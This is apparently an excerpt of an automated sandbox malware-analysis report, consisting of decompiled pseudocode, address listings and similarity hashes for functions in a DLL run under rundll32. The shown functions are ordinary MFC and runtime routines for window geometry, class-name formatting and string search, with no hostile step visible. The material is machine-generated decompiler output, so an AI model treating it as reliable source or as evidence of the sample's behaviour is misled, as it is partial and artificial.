                                                                                                        0x10012d21
                                                                                                        0x10012d25
                                                                                                        0x10012d2a
                                                                                                        0x10012d2b
                                                                                                        0x10012d2e
                                                                                                        0x10012d33
                                                                                                        0x10012d36
                                                                                                        0x10012d39
                                                                                                        0x10012d3d
                                                                                                        0x10012d43
                                                                                                        0x10012d4b
                                                                                                        0x10012d53
                                                                                                        0x10012d56
                                                                                                        0x10012dc3
                                                                                                        0x10012dca
                                                                                                        0x10012dcb
                                                                                                        0x10012dcd
                                                                                                        0x10012dcd
                                                                                                        0x10012dd2
                                                                                                        0x10012d58
                                                                                                        0x10012d5c
                                                                                                        0x10012d64
                                                                                                        0x10012d68
                                                                                                        0x10012d72
                                                                                                        0x10012d76
                                                                                                        0x10012d7c
                                                                                                        0x10012d80
                                                                                                        0x10012dbf
                                                                                                        0x10012dc1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012d82
                                                                                                        0x10012d86
                                                                                                        0x10012d9b
                                                                                                        0x10012da4
                                                                                                        0x10012da4
                                                                                                        0x10012da7
                                                                                                        0x10012db4
                                                                                                        0x10012db4
                                                                                                        0x10012da9
                                                                                                        0x10012dac
                                                                                                        0x10012dac
                                                                                                        0x10012db7
                                                                                                        0x10012dbb
                                                                                                        0x00000000
                                                                                                        0x10012dbb
                                                                                                        0x10012d78
                                                                                                        0x10012d78
                                                                                                        0x10012d79
                                                                                                        0x10012d79
                                                                                                        0x10012d79
                                                                                                        0x10012d6a
                                                                                                        0x10012d6a
                                                                                                        0x10012d6b
                                                                                                        0x10012d6b
                                                                                                        0x10012d5e
                                                                                                        0x10012d5e
                                                                                                        0x10012d5e
                                                                                                        0x10012d5f
                                                                                                        0x10012d5f
                                                                                                        0x10012d5c
                                                                                                        0x10012dd3
                                                                                                        0x10012dd4
                                                                                                        0x10012dd9
                                                                                                        0x10012dd9
                                                                                                        0x10012de8
                                                                                                        0x10012df6
                                                                                                        0x10012df8
                                                                                                        0x10012dfb
                                                                                                        0x10012e0b
                                                                                                        0x10012e0e
                                                                                                        0x10012e11
                                                                                                        0x10012e14
                                                                                                        0x10012e1a
                                                                                                        0x10012e23
                                                                                                        0x10012e26
                                                                                                        0x10012e29
                                                                                                        0x10012e2b
                                                                                                        0x10012e2f
                                                                                                        0x10012e36
                                                                                                        0x10012e36
                                                                                                        0x10012e39
                                                                                                        0x10012e3c
                                                                                                        0x10012e3c
                                                                                                        0x10012e3f
                                                                                                        0x10012e43
                                                                                                        0x10012e50
                                                                                                        0x10012e5b
                                                                                                        0x10012e64
                                                                                                        0x10012e64
                                                                                                        0x10012e67
                                                                                                        0x10012e6a
                                                                                                        0x10012e6d
                                                                                                        0x10012e70
                                                                                                        0x10012e72
                                                                                                        0x10012e75
                                                                                                        0x10012e78
                                                                                                        0x10012e7b
                                                                                                        0x10012e7e
                                                                                                        0x10012e7e
                                                                                                        0x10012e84
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012e8a
                                                                                                        0x10012e91
                                                                                                        0x10012e96
                                                                                                        0x10012e9a
                                                                                                        0x10012ea2
                                                                                                        0x10012eae
                                                                                                        0x10012eb3
                                                                                                        0x10012eb6
                                                                                                        0x10012eba
                                                                                                        0x10012ebd
                                                                                                        0x10012ec3
                                                                                                        0x10012ec4
                                                                                                        0x10012ec5
                                                                                                        0x10012ec6
                                                                                                        0x10012ec7
                                                                                                        0x10012ec7
                                                                                                        0x10012eca
                                                                                                        0x10012ecb
                                                                                                        0x10012ed1
                                                                                                        0x10012ed4
                                                                                                        0x10012ed7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012ed7
                                                                                                        0x10012ed9
                                                                                                        0x10012edc
                                                                                                        0x10012edc
                                                                                                        0x10012e43
                                                                                                        0x10012edf
                                                                                                        0x10012ee7
                                                                                                        0x10012eef
                                                                                                        0x10012eef
                                                                                                        0x10012ef2
                                                                                                        0x10012ef6
                                                                                                        0x10012ef8
                                                                                                        0x10012efd
                                                                                                        0x10012f00
                                                                                                        0x10012f08
                                                                                                        0x10012f0d
                                                                                                        0x10012f10
                                                                                                        0x10012f14
                                                                                                        0x10012f00
                                                                                                        0x10012f1d
                                                                                                        0x10012f29
                                                                                                        0x10012f2c
                                                                                                        0x10012f32
                                                                                                        0x10012f37
                                                                                                        0x10012f3e
                                                                                                        0x10012f41
                                                                                                        0x10012f4a
                                                                                                        0x10012f6d
                                                                                                        0x10012f89
                                                                                                        0x10012f8e
                                                                                                        0x10012f91
                                                                                                        0x10012f91
                                                                                                        0x10012f94
                                                                                                        0x10012f97
                                                                                                        0x10012f97
                                                                                                        0x10012f97
                                                                                                        0x10012f9a
                                                                                                        0x10012f9a
                                                                                                        0x10012f9f
                                                                                                        0x10012fa2
                                                                                                        0x10012fa7
                                                                                                        0x10012fab
                                                                                                        0x10012fab
                                                                                                        0x10012fb1
                                                                                                        0x10012fb4
                                                                                                        0x10012fb9
                                                                                                        0x10012d3d
                                                                                                        0x10012d19
                                                                                                        0x10012fbe
                                                                                                        0x10012fd3
                                                                                                        0x10012fe0
                                                                                                        0x10012feb
                                                                                                        0x10012ff8
                                                                                                        0x10012ffd
                                                                                                        0x10013002
                                                                                                        0x10013004
                                                                                                        0x10013004
                                                                                                        0x10013007
                                                                                                        0x10013009
                                                                                                        0x1001300f
                                                                                                        0x10013011
                                                                                                        0x10013011
                                                                                                        0x10013014
                                                                                                        0x1001301d

                                                                                                        APIs
                                                                                                        • SetRectEmpty.USER32(?), ref: 10012FBE
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • GetWindowRect.USER32 ref: 10012F4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$EmptyWindow_malloc
                                                                                                        • String ID: @
                                                                                                        • API String ID: 299164714-2766056989
                                                                                                        • Opcode ID: b4f2a1e80a4947264ace7f911f217cbcede9b01d498dcd89d55b1c24db883c5a
                                                                                                        • Instruction ID: fedc43d79cfd6302519751773159230c9bd7cf31ca5bab4897a4d92c273d7bf2
                                                                                                        • Opcode Fuzzy Hash: b4f2a1e80a4947264ace7f911f217cbcede9b01d498dcd89d55b1c24db883c5a
                                                                                                        • Instruction Fuzzy Hash: 1CC12AB1900219AFCF45CFA8C884AEEB7F5FF48354F118569E815AB251DB34ED91CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10032C01, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E10032C01(void* __ecx) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				struct tagRECT _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _v60;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v88;
				void* __ebx;
				void* __ebp;
				void* _t51;
				void* _t55;
				int _t65;
				long _t75;
				void* _t78;
				intOrPtr _t79;
				char _t96;
				void* _t98;
				void* _t101;
				void* _t102;

				_t82 = __ecx;
				_t101 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x84)) != 0) {
					return _t51;
				}
				_push(_t78);
				 *((intOrPtr*)(__ecx + 0x84)) = 1;
				_v8 = 1;
				_t55 = E1000E5E5(_t78, _t82, _t102, GetParent( *(__ecx + 0x20)));
				if(_t55 == 0) {
					L4:
					__eflags = E10032ACB(_t101, __eflags,  &_v28,  &_v20);
					if(__eflags != 0) {
						_t79 = _v24;
						_t96 = _v28;
						L10:
						E10032B46(_t101, _t105, _t96, _t79,  &_v12,  &(_v44.right),  &_v28, _v8);
						if(_v12 != 0) {
							_t79 = _t79 - _v16;
						}
						if(_v8 != 0) {
							_t96 = _t96 - _v20;
						}
						E10032310(_t101, _v28, _v24);
						_v80 = _v80 & 0x00000000;
						_v84 = 3;
						E1000D3E6(_t101, 0, _v12);
						if(_v12 == 0) {
							_t98 = 1;
							__eflags = 1;
						} else {
							_v72 = _t96;
							_v76 =  *((intOrPtr*)(_t101 + 0x68)) - 1;
							_t98 = 1;
							if(E1000C6FC(_t101, 0,  &_v88, 1) == 0) {
								E1000D381(_t101, _t72, _t72, _v44.right, 1);
							}
						}
						_t65 = E1000D3E6(_t101, _t98, _v8);
						if(_v8 != 0) {
							_v76 =  *((intOrPtr*)(_t101 + 0x6c)) - 1;
							_v72 = _t79;
							_t65 = E1000C6FC(_t101, _t98,  &_v88, _t98);
							if(_t65 == 0) {
								_t65 = E1000D381(_t101, _t98, _t65, _v44.bottom, _t98);
							}
						}
						 *(_t101 + 0x84) =  *(_t101 + 0x84) & 0x00000000;
						L22:
						return _t65;
					}
					_t65 = GetClientRect( *(_t101 + 0x20),  &_v44);
					__eflags = _v44.right;
					if(_v44.right > 0) {
						__eflags = _v44.bottom;
						if(_v44.bottom > 0) {
							_t65 = E1000D3E6(_t101, 3, 0);
						}
					}
					 *(_t101 + 0x84) = 0;
					goto L22;
				}
				_t75 = SendMessageA( *(_t55 + 0x20), 0x368, 0,  &_v60);
				_t105 = _t75;
				if(_t75 == 0) {
					goto L4;
				} else {
					_v8 = 0;
					E10032362(_t101,  &_v20);
					_t96 = _v52 - _v60;
					_t79 = _v48 - _v56;
					goto L10;
				}
			}































                                                                                                        0x10032c01
                                                                                                        0x10032c09
                                                                                                        0x10032c13
                                                                                                        0x10032d7a
                                                                                                        0x10032d7a
                                                                                                        0x10032c19
                                                                                                        0x10032c20
                                                                                                        0x10032c26
                                                                                                        0x10032c30
                                                                                                        0x10032c37
                                                                                                        0x10032c6c
                                                                                                        0x10032c7b
                                                                                                        0x10032c7d
                                                                                                        0x10032cab
                                                                                                        0x10032cae
                                                                                                        0x10032cb1
                                                                                                        0x10032cc4
                                                                                                        0x10032ccd
                                                                                                        0x10032ccf
                                                                                                        0x10032ccf
                                                                                                        0x10032cd6
                                                                                                        0x10032cd8
                                                                                                        0x10032cd8
                                                                                                        0x10032ce3
                                                                                                        0x10032ceb
                                                                                                        0x10032cf3
                                                                                                        0x10032cfa
                                                                                                        0x10032d03
                                                                                                        0x10032d35
                                                                                                        0x10032d35
                                                                                                        0x10032d05
                                                                                                        0x10032d08
                                                                                                        0x10032d0e
                                                                                                        0x10032d11
                                                                                                        0x10032d22
                                                                                                        0x10032d2c
                                                                                                        0x10032d2c
                                                                                                        0x10032d22
                                                                                                        0x10032d3c
                                                                                                        0x10032d45
                                                                                                        0x10032d4b
                                                                                                        0x10032d56
                                                                                                        0x10032d59
                                                                                                        0x10032d60
                                                                                                        0x10032d6a
                                                                                                        0x10032d6a
                                                                                                        0x10032d60
                                                                                                        0x10032d6f
                                                                                                        0x10032d76
                                                                                                        0x00000000
                                                                                                        0x10032d76
                                                                                                        0x10032c86
                                                                                                        0x10032c8c
                                                                                                        0x10032c8f
                                                                                                        0x10032c91
                                                                                                        0x10032c94
                                                                                                        0x10032c9b
                                                                                                        0x10032c9b
                                                                                                        0x10032c94
                                                                                                        0x10032ca0
                                                                                                        0x00000000
                                                                                                        0x10032ca0
                                                                                                        0x10032c46
                                                                                                        0x10032c4c
                                                                                                        0x10032c4e
                                                                                                        0x00000000
                                                                                                        0x10032c50
                                                                                                        0x10032c56
                                                                                                        0x10032c59
                                                                                                        0x10032c64
                                                                                                        0x10032c67
                                                                                                        0x00000000
                                                                                                        0x10032c67

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientMessageParentRectSend
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 608431981-440804003
                                                                                                        • Opcode ID: edca38ee4daf4d32e397a9c3fe17542a360bd420c8b760836e10350a7ab14dc2
                                                                                                        • Instruction ID: 443011a122fd189d430746ca9be63dcae140343e3e0312724a30a64fc2b8da9e
                                                                                                        • Opcode Fuzzy Hash: edca38ee4daf4d32e397a9c3fe17542a360bd420c8b760836e10350a7ab14dc2
                                                                                                        • Instruction Fuzzy Hash: FE416C71900209AFDF22DBA5CD85BEFBBFDFF88741F10041AE502A6190DB746A41DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10010FB1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E10010FB1(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E1000A5E4(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E1000AB19(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E1003F256(__eflags)));
					_t33 = E1003F256(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1003F3EF(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E1003F256(_t69)));
					_t52 = E1003F256(_t69);
					_push(_a4);
					 *_t52 = 0;
					E1003F3EF(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E1003F256(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E1003F256(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E1000B122( *((intOrPtr*)(E1003F256(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E1000CCF9(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(E10010F23(_t55, _t57, 0, _t62, _t71) == 0) {
							E100088D4(_t57);
						}
					}
					return _t62;
				}
			}




























                                                                                                        0x10010fc1
                                                                                                        0x10010fc9
                                                                                                        0x10010fd1
                                                                                                        0x10011006
                                                                                                        0x1001100d
                                                                                                        0x10011010
                                                                                                        0x10011015
                                                                                                        0x10011018
                                                                                                        0x1001101a
                                                                                                        0x1001101d
                                                                                                        0x10011020
                                                                                                        0x1001102e
                                                                                                        0x00000000
                                                                                                        0x10010fd8
                                                                                                        0x10010fd8
                                                                                                        0x10010fdb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010fe4
                                                                                                        0x10010fe7
                                                                                                        0x10010fec
                                                                                                        0x10010fef
                                                                                                        0x10010ffc
                                                                                                        0x10011036
                                                                                                        0x10011036
                                                                                                        0x1001103b
                                                                                                        0x1001103d
                                                                                                        0x1001104e
                                                                                                        0x10011053
                                                                                                        0x10011056
                                                                                                        0x1001103f
                                                                                                        0x10011046
                                                                                                        0x1001104b
                                                                                                        0x1001104b
                                                                                                        0x1001105b
                                                                                                        0x1001105c
                                                                                                        0x1001105d
                                                                                                        0x1001105e
                                                                                                        0x10011066
                                                                                                        0x10011068
                                                                                                        0x1001106d
                                                                                                        0x10011075
                                                                                                        0x1001107b
                                                                                                        0x10011081
                                                                                                        0x10011087
                                                                                                        0x1001108d
                                                                                                        0x1001108e
                                                                                                        0x10011091
                                                                                                        0x10011094
                                                                                                        0x10011097
                                                                                                        0x1001109a
                                                                                                        0x100110a4
                                                                                                        0x100110a6
                                                                                                        0x100110a6
                                                                                                        0x100110a4
                                                                                                        0x100110b1
                                                                                                        0x100110b1

                                                                                                        APIs
                                                                                                        • __snprintf_s.LIBCMT ref: 10010FFC
                                                                                                          • Part of subcall function 1003F3EF: __vsnprintf_s_l.LIBCMT ref: 1003F404
                                                                                                        • __snprintf_s.LIBCMT ref: 1001102E
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                        • API String ID: 3029210900-2801496823
                                                                                                        • Opcode ID: 5649b6c3fc595f8de9b54fd5a9d14c7ac0767ff9b9488a97d961d9b60dfa58b7
                                                                                                        • Instruction ID: 62eb787467dfbfed1e776d3be6af62b76ee006de1766c75f4a903abd02d015b0
                                                                                                        • Opcode Fuzzy Hash: 5649b6c3fc595f8de9b54fd5a9d14c7ac0767ff9b9488a97d961d9b60dfa58b7
                                                                                                        • Instruction Fuzzy Hash: 94317E79D00249EFCB12DFA5CC419DEBBF4EF4D291F10402AF948AB211E774AA90CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1004B82F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E1004B82F() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10061368;
					_v28 =  *0x10061360;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                        0x1004b834
                                                                                                        0x1004b83c
                                                                                                        0x1004b853
                                                                                                        0x1004b7ff
                                                                                                        0x1004b808
                                                                                                        0x1004b814
                                                                                                        0x1004b817
                                                                                                        0x1004b81a
                                                                                                        0x1004b81c
                                                                                                        0x1004b81f
                                                                                                        0x1004b824
                                                                                                        0x1004b82e
                                                                                                        0x1004b826
                                                                                                        0x1004b82a
                                                                                                        0x1004b82a
                                                                                                        0x1004b83e
                                                                                                        0x1004b844
                                                                                                        0x1004b84c
                                                                                                        0x00000000
                                                                                                        0x1004b84e
                                                                                                        0x1004b84e
                                                                                                        0x1004b852
                                                                                                        0x1004b852
                                                                                                        0x1004b84c

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,100402A0), ref: 1004B834
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1004B844
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                        • Opcode ID: 6fd5b1e6e5e231411b8e5ec4c18e2a8ba07fe27e6e182b1817c66669470078e4
                                                                                                        • Instruction ID: cd7ee7ee09c593951a5dcc08be1000c81f41c3732454af204898220ff2b93d79
                                                                                                        • Opcode Fuzzy Hash: 6fd5b1e6e5e231411b8e5ec4c18e2a8ba07fe27e6e182b1817c66669470078e4
                                                                                                        • Instruction Fuzzy Hash: F5F05430A00A19E2EF006FA1AC4E3AE7BB9FB81745F9205A4D696F00C4DF7082B4D385
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001FF7F, Relevance: 6.2, APIs: 4, Instructions: 212stringwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1001FF7F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t90;
				intOrPtr* _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t100;
				intOrPtr _t103;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t114;
				void* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr _t130;
				int _t131;
				intOrPtr _t139;
				CHAR* _t146;
				intOrPtr _t155;
				intOrPtr* _t158;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr* _t164;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;
				void* _t169;

				_push(0x1c);
				E1003EE82(0x10054bd7, __ebx, __edi, __esi);
				_t130 = __ecx;
				 *((intOrPtr*)(_t169 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x1c)) = E1001F715(__ecx);
				SendMessageA( *(_t130 + 0x20), 0xb0, _t169 - 0x20, _t169 - 0x28);
				_t164 =  *(_t169 - 0x20);
				_t90 = (0 |  *((intOrPtr*)(_t169 + 0xc)) != 0x00000000) + (0 |  *((intOrPtr*)(_t169 + 0xc)) != 0x00000000) - 1;
				 *((intOrPtr*)(_t169 - 0x10)) = _t90;
				if(_t164 != 0 || _t90 >= 0) {
					E10007B48( *((intOrPtr*)(E1000AB19(_t130, 0, _t164, __eflags) + 4)));
					 *(_t169 - 4) = 0;
					_t93 = E1001F665(_t130, 0);
					__eflags =  *((intOrPtr*)(_t169 - 0x10));
					_t158 = _t93;
					 *((intOrPtr*)(_t169 - 0x24)) = _t158;
					if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
						__eflags =  *(_t169 - 0x20) -  *(_t169 - 0x28);
						if(__eflags != 0) {
							_t123 = E1001FD2C(_t130, _t130, _t155, _t158, _t164, __eflags,  *(_t169 + 8),  *((intOrPtr*)(_t169 + 0x10)));
							__eflags = _t123;
							if(_t123 != 0) {
								_t125 = E1003F562( *((char*)(_t158 + _t164)));
								__eflags = _t125;
								if(_t125 != 0) {
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t164 = _t164 +  *((intOrPtr*)(_t169 - 0x10));
								__eflags = _t164;
							}
						}
					} else {
						_t164 = E1003F60C(_t158, _t158 + _t164) - _t158;
					}
					_t131 = lstrlenA( *(_t169 + 8));
					_t96 =  *((intOrPtr*)(_t169 - 0x1c));
					_t27 = _t164 - 1; // -1
					__eflags = _t131 + _t27 - _t96;
					if(_t131 + _t27 < _t96) {
						L18:
						_t155 = lstrcmpA;
						_t165 = _t164 + _t158;
						__eflags =  *((intOrPtr*)(_t169 + 0x10));
						if( *((intOrPtr*)(_t169 + 0x10)) == 0) {
							_t155 = lstrcmpiA;
						}
						__eflags =  *0x100991a0; // 0x0
						 *((intOrPtr*)(_t169 - 0x1c)) = _t155;
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t169 - 0x10));
							if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
								_t158 = _t158 - _t165 - _t131;
								__eflags = _t158;
								_t67 = _t96 + 1; // 0x1
								_t97 = _t158 + _t67;
								 *((intOrPtr*)(_t169 + 0xc)) = _t97;
							} else {
								_t97 = _t165 - _t158 + 1;
								 *((intOrPtr*)(_t169 + 0xc)) = _t97;
							}
							__eflags = _t97;
							if(_t97 <= 0) {
								L45:
								E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
								goto L46;
							} else {
								while(1) {
									_t158 = _t165 + _t131;
									 *((char*)(_t169 + 0x13)) =  *_t158;
									 *_t158 = 0;
									_t103 =  *((intOrPtr*)(_t169 - 0x1c))(_t165,  *(_t169 + 8));
									__eflags = _t103;
									_t139 =  *((intOrPtr*)(_t169 + 0x13));
									 *_t158 = _t139;
									if(_t103 == 0) {
										break;
									}
									 *((intOrPtr*)(_t169 + 0xc)) =  *((intOrPtr*)(_t169 + 0xc)) - 1;
									_t165 = _t165 +  *((intOrPtr*)(_t169 - 0x10));
									__eflags =  *((intOrPtr*)(_t169 + 0xc));
									 *_t158 = _t139;
									if( *((intOrPtr*)(_t169 + 0xc)) > 0) {
										continue;
									}
									goto L45;
								}
								E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
								_t167 = _t165 -  *((intOrPtr*)(_t169 - 0x24));
								_push(0);
								_push(_t167 + _t131);
								_push(_t167);
								goto L38;
							}
						} else {
							__eflags =  *((intOrPtr*)(_t169 - 0x10));
							if( *((intOrPtr*)(_t169 - 0x10)) <= 0) {
								 *((intOrPtr*)(_t169 - 0x18)) = _t165;
								_t165 = _t158;
							} else {
								_t39 = _t96 + 1; // 0x1
								 *((intOrPtr*)(_t169 - 0x18)) = _t158 - _t131 + _t39;
							}
							_t160 = 0;
							while(1) {
								__eflags = _t165 -  *((intOrPtr*)(_t169 - 0x18));
								if(_t165 >  *((intOrPtr*)(_t169 - 0x18))) {
									break;
								}
								__eflags =  *((intOrPtr*)(_t169 + 0x10));
								if( *((intOrPtr*)(_t169 + 0x10)) == 0) {
									L32:
									 *((char*)(_t169 + 0xf)) =  *((intOrPtr*)(_t165 + _t131));
									 *((char*)(_t165 + _t131)) = 0;
									_t110 =  *((intOrPtr*)(_t169 - 0x1c))(_t165,  *(_t169 + 8));
									__eflags = _t110;
									 *((char*)(_t165 + _t131)) =  *((intOrPtr*)(_t169 + 0xf));
									if(_t110 != 0) {
										L34:
										_t165 = E1003F61F(_t155, _t160, _t165);
										continue;
									}
									__eflags =  *((intOrPtr*)(_t169 - 0x10)) - _t110;
									_t160 = _t165;
									if( *((intOrPtr*)(_t169 - 0x10)) > _t110) {
										break;
									}
									goto L34;
								}
								_t112 =  *_t165;
								__eflags = _t112 -  *( *(_t169 + 8));
								if(_t112 !=  *( *(_t169 + 8))) {
									goto L34;
								}
								_t114 = E1003F562(_t112);
								__eflags = _t114;
								if(_t114 == 0) {
									goto L32;
								}
								_t146 =  *(_t169 + 8);
								__eflags =  *((intOrPtr*)(_t165 + 1)) - _t146[1];
								if( *((intOrPtr*)(_t165 + 1)) != _t146[1]) {
									goto L34;
